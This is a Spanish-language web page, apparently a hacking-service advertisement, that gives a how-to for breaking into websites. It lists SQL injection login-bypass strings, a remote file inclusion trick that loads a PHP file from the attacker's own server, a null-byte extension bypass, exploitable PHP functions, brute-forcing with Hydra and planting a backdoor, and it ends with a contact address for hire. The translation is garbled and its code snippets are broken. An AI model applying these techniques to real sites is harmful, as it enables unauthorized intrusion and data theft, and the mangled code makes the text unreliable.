Programa Hackear Paginas Web

Como Hackear paginas web 2020 utilizamos un programa desarrollado por nuestro equipo de hackers profesionales para vulnerar paginas y poder hackearlas Todos sabemos que la piratería no es más que la habilidad de este siglo.
Entonces, ¿qué significa?  Significa que no todos pueden obtener esa habilidad. para que pueda ver cuán privilegiado es saber piratear, en otras manos es como un deporte, algunos nacen con el talento, algunos tienen que practicar mucho para obtener las habilidades necesarias.

La razón por la cual muchos novatos y piratas informáticos no profesionales no logran un pirateo exitoso es porque no quieren esperar, la mayoría de las veces quieren un botón mágico donde puedan hacer clic y eso es todo, pero en realidad no funciona así, lo primero que debe hacer es un buen reconocimiento sobre su objetivo, para aquellos familiarizados con el desarrollo del software es más fácil entender lo que quiero decir, no puede desarrollar un buen software sin una buena documentación, solo como el UML en la industria del software aquí es el mismo, necesitamos información sobre el objetivo para facilitar nuestras tareas.

¿Por qué hackear un sitio web?

Incluso en caso de que nunca haya tenido un hack exitoso antes, supongo que una vez que ya conozca el significado de la imagen de arriba (la imagen parece un poco aterradora y más como una actitud de sombrero negro), la clasificación de los piratas informáticos realmente lo hace no tiene mucho sentido, en mi opinión hay novatos, piratas informáticos, piratas informáticos expertos y, lo que es peor, los derrapes, incluso como un sombrero blanco (según lo que el mundo define como sombrero blanco) a veces te encontrarás en situaciones donde tienes que abrir un agujero * porque están ejecutando sitios web no humanos como pornografía infantil, etc.

Hay un montón de tutoriales aquí en nulo — byte y en Internet sobre cómo hackear un sitio web con una herramienta específica, en caso de que quieras saber que estás en el lugar correcto, solo mira a tu alrededor, pero hoy quiero compartir algo que creo que será muy útil para ti, toma una taza de café, toma tu silla y comienza a leer esto, lo que te voy a mostrar hoy es totalmente diferente de mis otros tutoriales, en lugar de mostrarte cómo usar estas herramientas , lo guiaré sobre cómo puede utilizar con éxito estas herramientas y trucos para hackear cualquier sitio web, según mis experiencias.

 

Programa Hackear Paginas Web

 

Mi consejo sobre buen reconocimiento

¿Cuáles son los servicios que están ejecutando?

Descubra cosas como puertos abiertos, software y versiones en el servidor, e intente buscar el exploit en caso de que haya al menos uno en línea, o simplemente puede hacer su propio exploit.

Las herramientas que recomiendo para esta sección son nmap, whatweb y nikto y, por supuesto, algunas otras creadas por Mr_ Nakup3nda o usted.

¿Escribieron el guión solos?

En caso de que lo hayan escrito ellos mismos, busque secuencias de comandos que tomen la entrada del usuario, busque el listado del directorio, verifique el código fuente, descubra cómo reacciona el sitio web a las entradas anormales, a menudo uso estas entradas:

ADMIN ‘OR 1 = 1 # cuando es una URL de administrador como sitio web / admin / loign /

cuando es un inicio de sesión normal, simplemente intente con los inyectores sql tradicionales como
‘OR’ 1 ‘=’ 1 ‘-
‘ OR ‘1’ = ‘1’ ({
‘OR’ 1 ‘=’ 1 ‘/ *

, pero no termina aquí, intente escribir sentencias sql en las entradas, haga eco a usted, intente ejecutar un comando basado en el sistema operativo del servidor, descubra cómo el sitio web filtra las entradas e intenta omitir los filtros.

Y en caso de que usen el código de otra persona, como el CMS, simplemente tome una copia e intente encontrar los errores por su cuenta, o busque un exploit si usa una versión explotable del CMS.

[/vc_column_text][vc_separator color=»blue»][vc_column_text]

El malvado Google

A veces, pirateo sitios web simplemente con la ayuda de algunas búsquedas de Google diseñadas, como hacker debes saber cómo usar Google para recopilar información o piratear, en caso de que no lo sepas, puedes ver mi tutorial sobre cómo usar Google para piratear

Cambiar el código fuente

Apuesto a que en este punto ya sabes cómo ver el código fuente de una página web usando el truco del clic derecho, solo para recordar que los lenguajes de script como php, perl, asp, python, etc. se ejecutan en el lado del servidor, por lo que significa que no puede ver haciendo clic derecho a menos que sea una plataforma de código abierto donde puede obtener una copia y cambiar todo el código.

Lista de directorios

La exploración de índices puede ser muy útil cuando intenta encontrar archivos que normalmente no debería ver, como archivos de contraseña, archivos utilizados para administrar la página web, archivos de registro, cualquier archivo donde se almacena la información.

también puede verificar manualmente las URL sospechosas como esa:
website.com/logs/
website.com/files/
website.com/sql/
website.com/secret/
puede crear herramientas que lo harán automáticamente por usted, herramientas como dirbsuter puede ser muy útil para esta tarea.

[/vc_column_text][vc_separator color=»blue»][vc_column_text]

My Friend robots.txt

hackear paginas web 2020

Es muy importante mientras pirateas echar un vistazo a estos archivos, no explicaré el uso de robots.txt (solo google), a menudo nos llevan a una gran cantidad de caminos donde no quieren que los robots vean y a veces son caminos muy sensibles.

Inclusión de archivos remotos

La vulnerabilidad de inclusión de archivos es un tipo de vulnerabilidad que se encuentra con mayor frecuencia en los sitios web. Permite que un atacante incluya un archivo, generalmente a través de un script en el servidor web. La vulnerabilidad se produce debido al uso de entradas proporcionadas por el usuario sin la validación adecuada. A continuación tenemos un fragmento de código php que abre un archivo.

<? php
if (! ($ hfile = fopen («$ archivo», «r»))
echo («error no puede abrir el archivo: $ archivo <br /> \ n»);
?>
Este ejemplo abre el archivo con el nombre especificado en la entrada del usuario ($ archivo).
Eso significa que abre todos los archivos que un atacante quiere abrir y si permitir url fopen está ACTIVADO incluso en archivos remotos.
Mire, por ejemplo, este código:
Ejemplo:

<? php
include ($ dir. «/members.php»);
?>

Simplemente cree un archivo .members.php en su servidor web y llame al script de esta manera:
dir = http://www.server.com/

Ejecutará su archivo en el servidor de destino. Lo importante es que tienes PHP desactivado o el código se ejecutará en tu servidor.

Bytes NULOS

El nombre de nuestra comunidad puede ser y es una vulnerabilidad muy popular en la piratería de la vida.

Digamos que tienen un script que toma el nombre de archivo que obtiene y pone «.txt» al final. Por lo tanto, el programador intenta asegurarse de que solo se puedan abrir archivos txt.

Pero, ¿qué pasa con un nombre de archivo como este:
phppage.php% 00
Llegará a:
phppage.php% 00.txt
Entonces, fopen abre phppage.php% 00.txt o? ¡No! Y ese es el punto. Las funciones fopen se detienen después de
«.php» antes del byte NULL y abre solo «phppage.php». Por lo tanto, se puede abrir cada tipo de archivo.
Las secuencias de comandos que permiten cargas (pero solo para un determinado tipo de archivo) también son un objetivo potencial para este tipo de ataque.

Inyección SQL

La inyección SQL es una técnica de inyección de código, utilizada para atacar aplicaciones basadas en datos, en la que se insertan sentencias SQL maliciosas en un campo de entrada para su ejecución, en mi experiencia personal, este es el problema más popular que encontrará en los sitios web, el problema es que Algunos sitios web ponen esa información en una base de datos y no todos la filtran.

metodo hackear paginas web

Entonces, cuando hagas eco, el mensaje de JavaScript se mostrará.
Si acaban de iniciar sesión, la última parte debería causar un error de sql que podría darnos mucha información útil.
Puede probar el siguiente sitio web.com/users.php?id=1
y agregar el / ‘/ website.com/users.php?id=1’
si arroja un error de bingo, usted está allí.

Falsificaciones de solicitud entre sitios (CSRF) e inyección de comandos

Acerca de este tipo de ataque, también hice un tutorial sobre cómo puede proceder este tipo de ataques.

Funciones PHP explotables

Ejecución de código:
require () – lee un archivo e interpreta el contenido como código PHP
include () – lee un archivo e interpreta el contenido como código PHP
eval () – interpreta la cadena como código PHP
preg replace () – si usa el modificador / e interpreta la cadena de reemplazo como código PHP

Ejecución de comandos:
exec () – ejecuta el comando + devuelve la última línea de su salida
passthru () – ejecuta el comando + devuelve su salida al navegador remoto
(backticks) – ejecuta el comando y devuelve la salida en una matriz
shellexec – ejecuta el comando + devuelve la salida as string
system (): ejecuta el comando + devuelve su salida (al igual que passthru ()). no
puede manejar datos binarios
popen () – ejecuta el comando + conecta su salida o flujo de entrada a un descriptor de archivo PHP

Divulgación de archivos:
fopen () – abre un archivo y lo asocia con un archivo descriptor de archivos PHP
readfile () – lee un archivo y escribe su contenido directamente en el
archivo del navegador remoto () – lee un archivo completo en un
archivo de matriz obtener contenido () – lee el archivo en una cadena

[/vc_column_text][vc_separator color=»blue»][vc_column_text]

Fuerza bruta

A veces probará todos los métodos mencionados anteriormente, pero algunos sitios web son realmente seguros y no hay una manera fácil de explotarlos. 

A menudo, esto no nos impide piratearlos, pueden tener puertos abiertos que ejecutan algunos servicios como ftp, telnet, etc., intenta forzarlo y obtener la contraseña, Hydra es otra herramienta increíble para este tipo de tareas.

Acceso físico

Si tiene acceso físico al servidor, tiene todo en sus manos, sea discreto, deje una puerta trasera y listo.

Otros tipos de ataques que también puedes realizar son:

Desbordamiento de búfer Desbordamiento de
pila Desbordamiento de entero y la lista es larga, acabo de compartir lo que tengo ahora en mi mente, también puedes agregar el tuyo en las secciones de comentarios … nos vemos muy pronto en los próximos tutoriales.

CONTACTO AQUI : [email protected]